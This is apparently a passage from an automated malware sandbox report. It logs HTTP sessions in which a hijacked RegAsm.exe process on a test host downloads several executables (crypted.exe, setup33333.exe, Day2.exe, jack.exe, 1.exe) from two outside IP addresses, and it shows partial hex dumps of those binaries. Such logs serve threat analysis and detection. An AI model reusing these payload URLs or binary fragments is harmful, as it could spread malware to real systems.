                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66ee7931-66400"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d ba df d9 09 db b1 8a 09 db b1 8a 09 db b1 8a 66 ad 1a 8a 1b db b1 8a 66 ad 2f 8a 06 db b1 8a 66 ad 1b 8a 5c db b1 8a 00 a3 22 8a 02 db b1 8a 09 db b0 8a 86 db b1 8a 66 ad 1e 8a 08 db b1 8a 66 ad 2b 8a 08 db b1 8a 66 ad 2c 8a 08 db b1 8a 52 69 63 68 09 db b1 8a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 f6 25 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 48 03 00 00 b4 04 02 00 00 00 00 7e 3e 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 07 02 00 04 00 00 c5 b4 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Mff/f\"ff+f,RichPEL%dH~>`@JxLK*@$.textjGH `.data`ZL@.rsrc@@
                                                                                                                                                                                                                                Sep 21, 2024 13:33:44.937274933 CEST216OUTGET /yuop/66ed9885d9aee_Day2.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:45.120740891 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:45 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 3141632
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 15:45:09 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66ed9885-2ff000"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b2 1e 9f cc 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 0a 29 00 00 e2 06 00 00 00 00 00 ee 29 29 00 00 20 00 00 00 40 29 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a0 29 29 00 4b 00 00 00 00 60 29 00 bc d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 30 00 0c 00 00 00 4f 29 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL))) @)@ `0@))K`)@0O)) H.text) ) `.sdata@))@.rsrc`))@@.reloc@0/@B
                                                                                                                                                                                                                                Sep 21, 2024 13:33:47.278187990 CEST237OUTGET /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:47.467607975 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:47 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 331640
                                                                                                                                                                                                                                Last-Modified: Sat, 21 Sep 2024 10:55:47 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66eea633-50f78"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3d a1 ee 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 08 00 00 00 00 00 00 5e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 fb 04 00 53 00 00 00 00 00 05 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 e6 04 00 78 29 00 00 00 20 05 00 0c 00 00 00 d0 f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=f^ @ @`Sx) H.textd `.rsrc@@.reloc @B@H6Z9)^jPtY#AR\d47Z&ww|5':T*~xT7MwSaQpRtuqzD(&4 :OdV[ clprK]vY\_{'T-favw(Hn]gpj)OKVqQ*yP!Y;O.0@yt"u7nB=C^=Mi4b~td.#Xa`I\R!'}>}XJ


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.949710103.130.147.211806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.185962915 CEST203OUTHEAD /Files/1.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 103.130.147.211
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.760092974 CEST275INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:40 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 19:40:07 GMT
                                                                                                                                                                                                                                ETag: "65ba6e-6229234d7ee13"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 6666862
                                                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.761262894 CEST202OUTGET /Files/1.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 103.130.147.211
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108352900 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:40 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 19:40:07 GMT
                                                                                                                                                                                                                                ETag: "65ba6e-6229234d7ee13"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 6666862
                                                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 0e 7d ed 66 00 74 5f 00 a6 25 00 00 e0 00 06 01 0b 01 02 23 00 40 48 00 00 c6 5a 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 c6 00 00 06 00 00 29 87 66 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 a0 b3 00 42 00 00 00 00 b0 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 b3 00 68 20 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 f9 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}ft_%#@HZfPH@)f Bh H.text>H@H`P`.dataPHFH@`.rdata8pH`H@`@/4IH@0@.bssTfL`.edataBL@0@.idataL@0.CRT4L@0.tlsL@0.reloch "L@0B/14Z@B/29 Z@B/41XLN|\@B/55B \@B/67T]
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108370066 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 38 30 00 00 00 00 00 61 09 00 00 00 30 c5 00 00 0a 00 00 00 cc 5d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 31 00 00 00 00 00 05 8b 01 00 00 40 c5 00 00 8c 01 00 00 d6 5d 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: @0B/80a0]@B/91@]@B/102b_@B
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108381987 CEST1236INData Raw: fa 20 7e e7 89 cb 83 f3 01 80 fa 22 0f 44 cb eb e8 8d b4 26 00 00 00 00 8d 76 00 84 d2 74 14 8d 74 26 00 0f b6 50 01 83 c0 01 84 d2 74 05 80 fa 20 7e f0 a3 04 b0 8c 00 8b 1d 4c 87 f3 00 85 db 74 14 b8 0a 00 00 00 f6 45 d0 01 0f 85 e2 00 00 00 a3
                                                                                                                                                                                                                                Data Ascii: ~"D&vtt&Pt ~LtEP$44$,H EFEE$,Hp4$],HCOt$L$$7,H9}uEEE UG<D$ D$
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108484030 CEST1236INData Raw: 28 89 45 ec 8b 45 78 89 45 e0 8b 45 7c 89 45 e4 8b 85 80 00 00 00 89 45 d8 8b 85 84 00 00 00 89 45 dc 8d 45 44 89 44 24 04 8d 45 f4 89 04 24 e8 6a 6f 3b 00 90 c9 c3 55 89 e5 83 ec 10 c7 45 f4 c8 17 40 00 c7 45 f8 c4 17 40 00 c7 45 fc 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: (EExEE|EEEEDD$E$jo;UE@E@EEDEEEDU}u,EEE}tEUPEEE@Hu,EEE}tEUPEEE@
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108504057 CEST896INData Raw: ff d0 eb e7 90 c9 c3 55 89 e5 56 53 83 ec 20 8b 45 08 8b 40 10 8b 30 8b 45 08 8b 40 0c 8b 18 8b 45 08 8b 40 08 8b 08 8b 45 08 8b 40 04 8b 10 8b 45 08 8b 00 8b 00 89 74 24 10 89 5c 24 0c 89 4c 24 08 89 54 24 04 89 04 24 e8 bc 02 02 00 8b 45 08 c7
                                                                                                                                                                                                                                Data Ascii: UVS E@0E@E@E@Et$\$L$T$$E@ [^]UhE@E@EEDELD$DEHD$@EDD$<E@D$8E<D$4E8D$0E4D$,E0D$(E,D$$E(D$ E$D$E D$ED$ED$ED$
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108521938 CEST1236INData Raw: 7d f4 00 74 08 83 7d f4 01 75 16 eb 17 8b 45 08 89 04 24 e8 c3 af 43 00 c7 45 f4 01 00 00 00 eb 01 90 eb db c9 c3 55 89 e5 83 ec 28 c7 45 ec 0b 20 40 00 c7 45 f0 07 20 40 00 c7 45 f4 00 00 00 00 8b 45 f4 8b 44 85 ec eb 02 eb 1d ff e0 8b 45 08 89
                                                                                                                                                                                                                                Data Ascii: }t}uE$CEU(E @E @EEDE$5EEDUE^uEQEEEEEEEEEEEEEE EE$EE(EE,EE0EE4EE8EE<EE@EEDEEHEEL
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108547926 CEST1236INData Raw: 55 a0 89 54 24 30 8b 55 9c 89 54 24 2c 8b 55 98 89 54 24 28 8b 55 94 89 54 24 24 8b 55 90 89 54 24 20 8b 55 8c 89 54 24 1c 8b 55 88 89 54 24 18 89 7c 24 14 89 74 24 10 89 5c 24 0c 89 4c 24 08 8b 4d 84 89 4c 24 04 89 04 24 e8 71 7f 34 00 8b 45 08
                                                                                                                                                                                                                                Data Ascii: UT$0UT$,UT$(UT$$UT$ UT$UT$|$t$\$L$ML$$q4E@|[^_]U8EQE^AxEEEEwEDU$UWVSE^%@Ec%@EED4E(E EEME8E0E
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108567953 CEST1236INData Raw: b0 8b 45 58 8b 18 89 5d ac 8b 45 08 8b 30 89 75 a8 8b 45 20 dd 00 8b 45 58 8b 38 89 7d a4 8b 45 34 8b 08 89 4d a0 8b 45 48 8b 00 89 45 9c 8b 45 34 8b 18 89 5d 98 8b 45 18 8b 00 8b b0 5c af 01 00 89 75 94 8b 45 54 8b 38 89 7d 90 8b 45 74 8b 38 8b
                                                                                                                                                                                                                                Data Ascii: EX]E0uE EX8}E4MEHEE4]E\uET8}Et8E0ElELE EEEPE<EEpEH$$U$U$U$U$U$U$UT$|UT$x\$pUT$lU
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108690023 CEST1236INData Raw: 71 88 00 c7 45 fc 02 00 00 00 8b 45 fc 8b 44 85 ec eb e4 8b 45 08 c7 40 1c 6c 71 88 00 c7 45 fc 00 00 00 00 8b 45 fc 8b 44 85 ec eb ca 90 c9 c3 55 89 e5 57 56 53 81 ec 6c 01 00 00 c7 45 b4 ae 39 40 00 c7 45 b8 c1 3b 40 00 c7 45 bc a6 3d 40 00 c7
                                                                                                                                                                                                                                Data Ascii: qEEDE@lqEEDUWVSlE9@E;@E=@E=@E.@E0@Ee5@E.@E;@E7@E2@E9@EEDE4EPEXEE<]0u8}ELMUE]E
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108707905 CEST896INData Raw: 8b 85 a0 00 00 00 8b 38 89 7d 98 8b 85 a8 00 00 00 8b 10 89 55 94 8b 85 b4 00 00 00 8b 00 89 45 90 8b 85 a8 00 00 00 8b 30 89 75 88 8b 85 a0 00 00 00 8b 38 89 7d 84 8b 85 9c 00 00 00 8b 10 89 55 80 8b 85 80 00 00 00 8b 00 89 85 7c ff ff ff 8b 85
                                                                                                                                                                                                                                Data Ascii: 8}UE0u8}U|0x8thp0dPX\8`TP0L8H
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.108727932 CEST1236INData Raw: 8b 45 98 89 84 24 90 00 00 00 8b 45 94 89 84 24 8c 00 00 00 dd 9c 24 84 00 00 00 d9 c9 8b 85 a0 00 00 00 89 84 24 80 00 00 00 8b 45 90 89 44 24 7c 8b 45 88 89 44 24 78 dd 5c 24 70 8b 45 84 89 44 24 6c 8b 45 80 89 44 24 68 8b 85 7c ff ff ff 89 44
                                                                                                                                                                                                                                Data Ascii: E$E$$$ED$|ED$x\$pED$lED$h|D$dxD$`tD$\hD$XpD$TdD$PXD$L`D$H\$@TD$<PD$8LD$4HD$0DD$,D$(@D$$D$ <


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.949709147.45.44.104806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.186038971 CEST224OUTHEAD /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.842557907 CEST309INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:40 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 361336
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 18:02:03 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66edb89b-58378"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.842791080 CEST228OUTHEAD /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.109349966 CEST309INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:40 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 418816
                                                                                                                                                                                                                                Last-Modified: Sat, 21 Sep 2024 07:43:45 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66ee7931-66400"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.110549927 CEST217OUTHEAD /yuop/66ed9885d9aee_Day2.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.296865940 CEST311INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 3141632
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 15:45:09 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66ed9885-2ff000"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.297193050 CEST216OUTGET /prog/66e705d09b33c_jack.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.490211964 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 4249600
                                                                                                                                                                                                                                Last-Modified: Sun, 15 Sep 2024 16:05:36 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66e705d0-40d800"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5f 55 fb d1 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 3e 00 00 38 02 00 00 00 00 00 ae ba 3e 00 00 20 00 00 00 c0 3e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 41 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 60 ba 3e 00 4b 00 00 00 00 e0 3e 00 84 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 41 00 0c 00 00 00 10 ba 3e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_U>8> >@ @A@`>K>. A> H.text> > `.sdata>>@.rsrc.>0>@@.reloc A@@B
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.490366936 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: >H0&MPVjO*([<*([<*****
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.490381956 CEST1236INData Raw: 00 00 00 12 00 00 17 2a 00 00 00 1a 28 5b 3c 00 06 2a 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 1a 28 5b 3c 00 06 2a 00 13 30 03 00 ec 00 00 00 01 00 00 11 28 5b 3c 00 06 28 14 00 00 06 28
                                                                                                                                                                                                                                Data Ascii: *([<*****([<*0([<((:& 8Fs 82s :&s8a E+?] (:&(<8w&
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.490542889 CEST1236INData Raw: 01 25 16 07 a2 25 17 72 75 02 00 70 28 3e 00 00 0a 72 7d 02 00 70 72 f7 02 00 70 7e 41 00 00 0a 28 3d 00 00 0a 28 42 00 00 0a a2 25 18 17 8c 53 00 00 01 a2 25 19 17 8d 1e 00 00 01 25 16 72 05 03 00 70 a2 a2 14 0d 12 03 28 52 00 00 06 28 31 00 00
                                                                                                                                                                                                                                Data Ascii: %%rup(>r}prp~A(=(B%S%%rp(R(1 8EO($r)prgp(=rkp(>(B%%ruprprp(=r=prpo=rprpo=%S%%(R& 8
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.490559101 CEST1236INData Raw: 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00
                                                                                                                                                                                                                                Data Ascii: ******************************
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.490575075 CEST1236INData Raw: 00 00 00 1a 28 5b 3c 00 06 2a 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 1a 28 5b 3c 00 06 2a 00 1a 28 5b 3c 00 06 2a 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00
                                                                                                                                                                                                                                Data Ascii: ([<*0****([<*([<*****([<*****([<*V([<(I(JK*0*0*0*0*0
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.490591049 CEST1236INData Raw: 10 00 00 02 00 8b 00 1a a5 00 0d 00 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04
                                                                                                                                                                                                                                Data Ascii: ********0*0**0*/*0*0****0
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.491255045 CEST552INData Raw: 28 5b 3c 00 06 2a 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 1a 28 5b 3c 00 06 2a 00 12 00 00
                                                                                                                                                                                                                                Data Ascii: ([<*0*0*****([<****0*****([<******([<*****
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.491323948 CEST1236INData Raw: 14 a5 8b 00 00 02 2a 12 00 00 00 2a 00 00 00 13 30 03 00 08 00 00 00 00 00 00 00 00 14 a5 8f 00 00 02 2a 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00
                                                                                                                                                                                                                                Data Ascii: **0***0*****([<*0*0*0**0*}+0*([<(<%(
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.491342068 CEST1236INData Raw: 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 22 00 14 a5 2c 00 00 02 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 05 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 05 00 08 00 00 00 00 00 00 00 00 14 a5
